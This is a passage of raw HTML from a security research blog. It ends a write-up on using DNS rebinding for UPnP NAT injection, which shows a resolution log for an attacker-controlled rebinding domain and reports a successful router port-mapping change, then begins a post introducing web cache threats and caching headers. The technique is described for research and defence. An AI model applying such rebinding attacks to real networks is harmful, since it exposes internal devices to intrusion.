style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">4 127-0-0-1.192-168-1-1.attacker.mindedsecurity.com -> 127.0.0.1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">5 127-0-0-1.192-168-1-1.attacker.mindedsecurity.com -> 127.0.0.1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">6 127-0-0-1.192-168-1-1.attacker.mindedsecurity.com -> 127.0.0.1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">7 127-0-0-1.192-168-1-1.attacker.mindedsecurity.com -> 127.0.0.1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">8 127-0-0-1.192-168-1-1.attacker.mindedsecurity.com -> 192.168.1.1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">. . .</span></pre></div><p style="text-align: left;">This way, the request was successfully sent to the router adding the new port mapping rule:</p><div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwBTnTA04pWv2on1dFJLlCodvAHa1DjMzTaZQVYxoCPjiJGdcr8flX2vZlndRBcL4L66xEqRJBSnEkYU8Mu1zbNTdquupt58wxAgnlAQPNdlxnU-WCW7mIAwP4HrvWW1xofrQIgdc600jU/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="127" data-original-width="1351" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwBTnTA04pWv2on1dFJLlCodvAHa1DjMzTaZQVYxoCPjiJGdcr8flX2vZlndRBcL4L66xEqRJBSnEkYU8Mu1zbNTdquupt58wxAgnlAQPNdlxnU-WCW7mIAwP4HrvWW1xofrQIgdc600jU/w640-h60/nat.png" width="640" /></a></div><p style="text-align: left;"><span style="font-family: inherit;">The following diagram shows the complete attack flow.</span></p></div></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhORfqr28X7Q_nvK829h-aCfhcKn84I16OkBQc4wVAd2VLH_rRyN5pPZc6qxDv1_97BYSH1leTL3YRYgzJTlClCB7R-eMczYPmNkxMbgZNfXg0ChdjShO9rM-dgly_K43Dlb402D2bMwId3/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="662" data-original-width="1031" height="410" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhORfqr28X7Q_nvK829h-aCfhcKn84I16OkBQc4wVAd2VLH_rRyN5pPZc6qxDv1_97BYSH1leTL3YRYgzJTlClCB7R-eMczYPmNkxMbgZNfXg0ChdjShO9rM-dgly_K43Dlb402D2bMwId3/w640-h410/upnp_diagram.png" width="640" /></a></div></div><div><h3 style="text-align: left;">Conclusion</h3><div style="text-align: justify;"><p>The described NAT Injection attack is just an example of how <b>DNS Rebinding</b> could be used to reach services running in a local network. It is however still possible to go deeper and use <b>DNS Rebinding</b> techniques in order to achieve <b>Remote Code Execution</b>.</p><div>For this reason, in the next part it will be described as another practical example that will show how to achieve RCE starting from a vulnerable service running in a local network.</div><div><br /></div></div><h3 style="text-align: left;">References:</h3><div><span id="docs-internal-guid-e813ec57-7fff-f1c4-8f17-6ff632552879"><ul style="margin-bottom: 0px; margin-top: 0px; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><a href="https://crypto.stanford.edu/dns/">https://crypto.stanford.edu/dns/</a></span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #1155cc; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;"><a href="http://upnp.org/specs/arch/UPnP-arch-DeviceArchitecture-v2.0.pdf">http://upnp.org/specs/arch/UPnP-arch-DeviceArchitecture-v2.0.pdf</a></span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><a href="https://tools.ietf.org/id/draft-bpw-pcp-upnp-igd-interworking-01.html">https://tools.ietf.org/id/draft-bpw-pcp-upnp-igd-interworking-01.html</a></span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><a href="https://tools.ietf.org/html/rfc6970">https://tools.ietf.org/html/rfc6970</a></span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><a href="http://www.upnp-hacks.org/">http://www.upnp-hacks.org/</a></span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><a href="http://www.upnp-hacks.org/igd.html">http://www.upnp-hacks.org/igd.html</a></span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #1155cc; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;"><a href="https://www.blackhat.com/presentations/bh-usa-08/Squire/BH_US_08_Squire_A_Fox_in_the_Hen_House%20White%20Paper.pdf">https://www.blackhat.com/presentations/bh-usa-08/Squire/BH_US_08_Squire_A_Fox_in_the_Hen_House%20White%20Paper.pdf</a></span></p></li><li aria-level="1" dir="ltr" style="font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre;"><a href="https://www.akamai.com/uk/en/multimedia/documents/white-paper/upnproxy-blackhat-proxies-via-nat-injections-white-paper.pdf">https://www.akamai.com/uk/en/multimedia/documents/white-paper/
upnproxy-blackhat-proxies-via-nat-injections-white-paper.pdf</a></span></span></p></li></ul></span></div></div><p></p>Alessandro Bracciohttp://www.blogger.com/profile/11077564935025195085noreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-3170058117697014302021-01-26T03:12:00.001-08:002021-01-26T03:14:52.195-08:00Demystifying Web Cache Threats<h3><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiWL3jEeTLPmGyJjKXnLpPwr-d-BbCGNMHKmFBzDeq50KbLehNFFzo-VkEAfWlBu2NDbkTP-PSM4fT-KX5atRzl8fDjhWDGQaaNFwDIzwVO4UtjyTMhymBMAIhD-5NeWPFRJ-ySJvJBzUR/" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img alt="" data-original-height="227" data-original-width="222" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiWL3jEeTLPmGyJjKXnLpPwr-d-BbCGNMHKmFBzDeq50KbLehNFFzo-VkEAfWlBu2NDbkTP-PSM4fT-KX5atRzl8fDjhWDGQaaNFwDIzwVO4UtjyTMhymBMAIhD-5NeWPFRJ-ySJvJBzUR/" width="235" /></a></div><br /><br /></div><br />Authors</h3>
<ul>
<li>Alessandro Brucato</li>
<li>Giorgio Rando</li>
</ul>
<br />
<h3 style="text-align: left;">Introduction</h3>
<p style="text-align: left;">
Did you know the word “<i>Cache</i>” comes from French and means “<a href="https://www.etymonline.com/word/cache" target="_blank">Hidden</a>”?<br />If we transpose it to IT we can see why it has been named as such: It
is because of its nature.<br />A concealed and faster memory part of a CPU
used to overcome the bottleneck of a slower RAM externally connected via <a href="https://en.wikipedia.org/wiki/Cache_(computing)" target="_blank">BUS</a>.<br /><br />In
general, a caching algorithm has a predefined <i>set of primary keys </i>to be
matched so that it will be able to retrieve or store data according to
them.<br />
The use of cache techniques has been spreading over time along with
technologies, resulting in features such as:
</p>
<p style="text-align: left;"></p>
<ul>
<li>- <a href="https://en.wikipedia.org/wiki/Database_caching" target="_blank">Database Caching</a></li>
<li>- <a href="https://www.solarwindsmsp.com/blog/dns-cache-overview" target="_blank">DNS Caching</a></li>
<li>- <a href="https://en.wikipedia.org/wiki/Distributed_cache" target="_blank">Distributed Cache</a></li>
</ul>
<br />
<p>
Last but not least, when it comes to <i>Web Applications</i> and <i>Web Servers</i>, caching
has become a very important feature capable of managing thousands of different
users and requests per second.<br />In this case it is known as
<b>Web Cache</b>.<br /><i>Web Cache </i>principles are:<br />
</p>
<p></p>
<ul style="text-align: left;">
<li>- Temporary storage of Web Application generated content (usually customized
according to the different user’s data);
</li>
<li>- Avoid unnecessary <b>server overload</b>, which would be otherwise needed to
generate again the customized content;
</li>
<li>- Define unique tuples (n-dimensional keys) per entry.</li>
</ul>
<p>
<br />In case of web cache usage, contents generated from a web server are
temporarily stored within the cache memory (<i>Request #1</i> in the schema below).
Then, the subsequent request (<i>Request #2</i>) will not be processed by the web
server since it will be returned by the web cache.
</p>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4L4SinZnTQWBb-6Q0tjls5bRoqHx2JJjwnWlLzyblh3jEu4rbztJoQPiJxF3_5J2xd99lnMWp3_HT8SKbUmlLh0h4KX11YMeqa7WnSUb_8xj0kzFoKl2z79XARKObCTiqn9qC3QrbV-M/s312/web_cache_schema+%25281%2529.png" style="clear: right; display: block; float: right; margin-bottom: 1em; margin-left: 1em; padding: 1em 0px; text-align: center;"></a></div><h3><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ6wD_-vVk3OPMQq52DKd1FvA_NGLS7IUHXTpb13i4h6pTrpWXhcIrKXSPU3-Rf7nG9mdBn4TRTCJb_DKiXBEdDQpPcLj2z88tZy_w0P3FY75FVbhBQHsvSChjSDQUCIZ2oHGHNLFq0LV2/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="343" data-original-width="854" height="258" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ6wD_-vVk3OPMQq52DKd1FvA_NGLS7IUHXTpb13i4h6pTrpWXhcIrKXSPU3-Rf7nG9mdBn4TRTCJb_DKiXBEdDQpPcLj2z88tZy_w0P3FY75FVbhBQHsvSChjSDQUCIZ2oHGHNLFq0LV2/w640-h258/image.png" width="640" /></a></div><br /><br /></h3><h3>The Cache Flow</h3>
<p>When client and server interact, there might be one or more middleware <i>caching</i>
components elaborating data in a more or less transparent way, during the
actual client-server communication. The following components might involve
data caching such as:
</p>
<ul>
<li><i>- <u>Internet Browsers</u></i>: static copies of the required web pages are stored within the device local disk, in order to provide a quicker response to a user if the requested web page has not be changed after the last request;</li>
<li><i>- <u>Internet Service Providers </u>(ISPs</i>): due to the huge amount of requests that providers have to handle, often they rely on their own cache copies, in order to limit the bandwidth use;</li>
<li><i>- <u>Internet Gateways</u></i>: cached pages are stored within the web server reverse proxy in order to optimize the server memory use, avoiding useless overloads on the main one;</li>
<li><i>- <u>Web Server Proxies</u></i>: unlike other components which are detached from the internal network of the web server, often the “<i>Web Server Proxies</i>” are deployed on organisation network boundaries. The behaviour of this component is the same described above for <i>ISPs</i> and<i> Internet Gateways </i>components;</li>
<li><i>- <u>Content Delivery Networks</u> (CDNs)</i>: users are redirected (through a <i>DNS</i> service) to <i>CDNs</i> when a website which relies on <i>CDNs</i> servers is required. One of the <i>CDN</i> objectives is to cache in an orderly fashion the different requested web pages from different regions;</li>
<li><i>- <u>Internal Servers</u>:</i> the <i>internal</i> <i>servers</i> cache has the same aim of <i>Internet Gateways </i>one, reducing requests processing overload by temporarily saving required web pages.</li>
</ul>
<br />
<p>The following diagram shows how the aforementioned components are usually distributed within a client-server communication.</p>
<div class="separator" style="clear: both;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj822WugVjSAOzZFcGMuj-SRonyFQvvz2UF0_UOCTOGYo5nkqjQtmR9GtCjyIpe9kCJWXzmZFRnO2KPM_GTe-NpwVcrc7zfklnkzy0V5WWGoIX6gHQSQDrIdtWf9svusecZbOcNPxjzZKE/s1681/components_diagram.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="851" data-original-width="1681" height="323" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj822WugVjSAOzZFcGMuj-SRonyFQvvz2UF0_UOCTOGYo5nkqjQtmR9GtCjyIpe9kCJWXzmZFRnO2KPM_GTe-NpwVcrc7zfklnkzy0V5WWGoIX6gHQSQDrIdtWf9svusecZbOcNPxjzZKE/w640-h323/components_diagram.png" width="640" /></a></div><br /><span style="text-align: left;">Each one of these components might handle its own cached copy, which is useful in a number of particular contexts. However, not every caching component can be controlled by the end user and that might pose a threat from a privacy point of view. </span></div><p><br /></p><p>
For instance,<b><i> internet browser web cache </i></b>is highly manageable by the end-user itself, being able to delete at his sole discretion the web pages cached within. </p><p>On the other hand, <b><i>ISPs</i></b> and <b><i>CDNs</i></b> (just to mention a few) work in a different manner and interact with the cached web pages without user interaction, according to particular HTTP directives.
<br /><br /></p><p>
Usually, these directives are defined through <i>HTTP Headers</i> which are parsed by the caching servers to understand if a web page has changed after its last request.
<br /><br /></p><p>
The full set of standard headers used for caching is defined in the <a href="https://tools.ietf.org/html/rfc7234#section-5" target="_blank">RFC7234</a>, some of them follows:</p><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none;"><colgroup><col width="339"></col><col width="261"></col></colgroup><tbody><tr style="height: 21pt;"><td style="background-color: #0b5394; border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: white; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Header</span></p></td><td style="background-color: #0b5394; border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: white; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Definition</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Age</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">delta-seconds</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Cache-Control</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">(request)</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">max-age</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">max-stale</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">min-fresh</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">only-if-cached</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">no-cache</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">no-store</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">no-transform</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Cache-Control</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">(response)</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">max-age</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">s-maxage</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">must-revalidate</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">no-cache</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">no-store</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">no-transform</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">public</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">private</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">proxy-revalidate</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Expires</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">HTTP-date timestamp</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Pragma</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">(allows backwards compatibility with HTTP/1.0 caches)</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">no-cache, token</span></p></td></tr></tbody></table></div><p><br /></p>
<p>In addition, more conditional headers can be implemented in the request and response, in order to ensure some precondition while a web page cache-copy has to be provided to users.
